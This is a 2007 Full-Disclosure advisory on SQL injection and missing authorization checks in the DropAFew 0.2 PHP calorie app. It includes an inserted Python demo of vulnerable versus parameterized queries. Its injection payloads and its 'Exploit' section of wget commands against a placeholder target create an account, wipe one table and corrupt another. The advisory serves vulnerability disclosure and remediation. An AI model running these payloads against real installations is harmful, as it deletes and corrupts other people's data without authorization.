[Full-disclosure] DropAFew - SQL injection and authorization issues

Type securityvulns
Reporter Securityvulns
Modified 2007-04-11T00:00:00



============================================
||| Security Advisory AKLINK-SA-2007-002 |||
||| CVE-2007-1363 (CVE candidate)        |||
||| CVE-2007-1364 (CVE candidate)        |||
============================================

DropAFew - Multiple vulnerabilities (SQL injection, authorization issue)

Date released: 10.04.2007
Date reported: 07.03.2007
$Revision: 1.1 $

by Alexander Klink
Cynops GmbH
a.klink@cynops.de
https://www.cynops.de/advisories/CVE-2007-1363.txt
(S/MIME signed: https://www.cynops.de/advisories/CVE-2007-1363-signed.txt)
https://www.klink.name/security/aklink-sa-2007-002-dropafew-sqlinjection.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1363
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1364

Vendor: Chris Bratlien (Open Source)
Product: DropAFew - a multi-user calorie counting program using PHP
Website: http://www.dropafew.com
Vulnerability: SQL injection attack, authorization issues
Class: remote
Status: patched
Severity: moderate (database corruption and some information disclosure)
Releases known to be affected: 0.2
Releases known NOT to be affected: 0.2.1

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

SQL injection is possible in several places and may lead to the deletion or corruption of the two most important database tables of the application. The vulnerability works without query stacking and with magic_quotes_gpc set to on, since the injected values contain no quote characters.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

An SQL injection is present in search.php and search-pda.php in the delete action. Setting id to, for example, "1 OR id > 0 --" deletes the contents of the foodfacts table completely.

In editlogcal.php, the save action allows an SQL injection into an UPDATE statement via the calories variable. Setting calories to, for example, "1000 WHERE id > 0 /*" corrupts the logcal table, reducing every row to the same entry (so it looks like everybody keeps eating the same thing again and again).

Also in editlogcal.php, the id parameter is not checked for authorization, so a user can view the logged calories of all users (without learning who ate what, though).

Furthermore, links.php allows a user to add publicly viewable links to everyone's link page, which other users cannot remove; this could be abused for spam.
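The three defects described above, modelled as an added example that is not part of the advisory or of DropAFew's code (the application itself is PHP; its real schema, column names and user model are not on the page, so the tables, rows and user names below are constructed). The vulnerable functions build SQL by string concatenation exactly as the advisory describes, and the hardened versions bind request values as parameters and scope every logcal row to its owner:

```python
import sqlite3

# Constructed sample data; the real DropAFew schema is not on the page.
SEED_FOODFACTS = [(1, "nature", "strawberries", 10),
                  (2, "nature", "apple", 52),
                  (3, "bakery", "bagel", 250)]
SEED_LOGCAL = [(1, "alice", 1, 10),   # (id, owner, food_id, calories)
               (2, "bob", 2, 52),
               (3, "alice", 3, 250)]


def make_db():
    """Fresh in-memory database with the two tables the advisory names."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE foodfacts (id INTEGER PRIMARY KEY, vendor TEXT,
                                item TEXT, calories INTEGER);
        CREATE TABLE logcal (id INTEGER PRIMARY KEY, username TEXT,
                             food_id INTEGER, calories INTEGER);
    """)
    conn.executemany("INSERT INTO foodfacts VALUES (?,?,?,?)", SEED_FOODFACTS)
    conn.executemany("INSERT INTO logcal VALUES (?,?,?,?)", SEED_LOGCAL)
    conn.commit()
    return conn


# --- vulnerable pattern: request values concatenated into the SQL text -------
def vulnerable_delete(conn, id_param):
    conn.execute(f"DELETE FROM foodfacts WHERE id = {id_param}")
    conn.commit()


def vulnerable_save(conn, id_param, calories_param):
    conn.execute(f"UPDATE logcal SET calories = {calories_param} WHERE id = {id_param}")
    conn.commit()


def vulnerable_view(conn, id_param):
    # No ownership check: any row id is readable by any logged-in user.
    return conn.execute(f"SELECT calories FROM logcal WHERE id = {id_param}").fetchall()


# --- hardened pattern: type-check, bind parameters, check ownership ----------
def safe_delete(conn, id_param):
    food_id = int(id_param)            # ValueError on "1 OR id > 0 --"
    conn.execute("DELETE FROM foodfacts WHERE id = ?", (food_id,))
    conn.commit()


def safe_save(conn, user, id_param, calories_param):
    row_id, calories = int(id_param), int(calories_param)
    cur = conn.execute(
        "UPDATE logcal SET calories = ? WHERE id = ? AND username = ?",
        (calories, row_id, user))
    conn.commit()
    return cur.rowcount                # 0: row missing or not owned by user


def safe_view(conn, user, id_param):
    return conn.execute(
        "SELECT calories FROM logcal WHERE id = ? AND username = ?",
        (int(id_param), user)).fetchall()


def row_count(conn, table):
    if table not in ("foodfacts", "logcal"):   # allow-list, never user input
        raise ValueError(table)
    return conn.execute(f"SELECT COUNT(*) FROM {table}").fetchone()[0]


def demo():
    """Replays the advisory's payloads against both code paths."""
    r = {}
    conn = make_db()
    vulnerable_delete(conn, "1 OR id > 0 --")          # payload from the advisory
    r["rows_after_vuln_delete"] = row_count(conn, "foodfacts")

    conn = make_db()
    vulnerable_save(conn, "1", "10 WHERE id > 0 /*")   # payload from the advisory
    r["distinct_calories_after_vuln_save"] = conn.execute(
        "SELECT COUNT(DISTINCT calories) FROM logcal").fetchone()[0]

    conn = make_db()
    r["vuln_view_other_user"] = len(vulnerable_view(conn, "2"))  # alice reads bob's row

    conn = make_db()
    try:
        safe_delete(conn, "1 OR id > 0 --")
    except ValueError:
        pass                                            # rejected before reaching SQL
    r["rows_after_safe_delete_attempt"] = row_count(conn, "foodfacts")
    r["safe_save_other_user"] = safe_save(conn, "alice", "2", "10")
    r["safe_save_own_row"] = safe_save(conn, "alice", "1", "10")
    r["safe_view_other_user"] = len(safe_view(conn, "alice", "2"))
    return r


if __name__ == "__main__":
    print(demo())
```

Both payloads contain no quote character, which is why the advisory notes that magic_quotes_gpc does not help: escaping quotes is not a substitute for binding parameters. The ownership predicate in the UPDATE and SELECT fixes the missing authorization check on id independently of the injection fix.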

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit:

# create new user
wget --save-cookies cookies --keep-session-cookies --post-data='username=exploit&password=1&password_confirm=1' http://[target]/calorie/newaccount2.php

# delete foodfacts table
wget --load-cookies cookies --post-data='id=1%20OR%20id%20>%200--&action=del' http://[target]/calorie/search.php

# make everyone have eaten 1000 strawberries, but hey, they were only 10 calories ...
wget --load-cookies cookies --post-data='action=save&id=1&date=20070101&time=23232323&vendor=nature&item=strawberries&portion=1000&calories=10+WHERE+id+%3E+0+%2F*' http://[target]/calorie/editlogcal.php

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Workaround:

Filter the requests, and restrict access to the application to trusted users only.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

  • 07.03.2007: Problem reported to author
  • 07.03.2007: Vendor replies and confirms the problem, presents ideas for a solution
  • 03.04.2007: Contacted vendor to check back on status
  • 03.04.2007: Vendor responds with updated version 0.2.1

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

Update to version 0.2.1 (http://dropafew.com/download/dropafew-0.2.1.zip)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credit:

Alexander Klink, Cynops GmbH (discovery and exploit development)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)


--
Dipl.-Math. Alexander Klink | IT-Security Engineer | a.klink@cynops.de
mobile: +49 (0)178 2121703  | Cynops GmbH          | http://www.cynops.de
----------------------------+----------------------+---------------------
HRB 7833, Amtsgericht       | USt-Id: DE 213094986 | Geschäftsführer:
Bad Homburg v. d. Höhe      |                      | Martin Bartosch

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/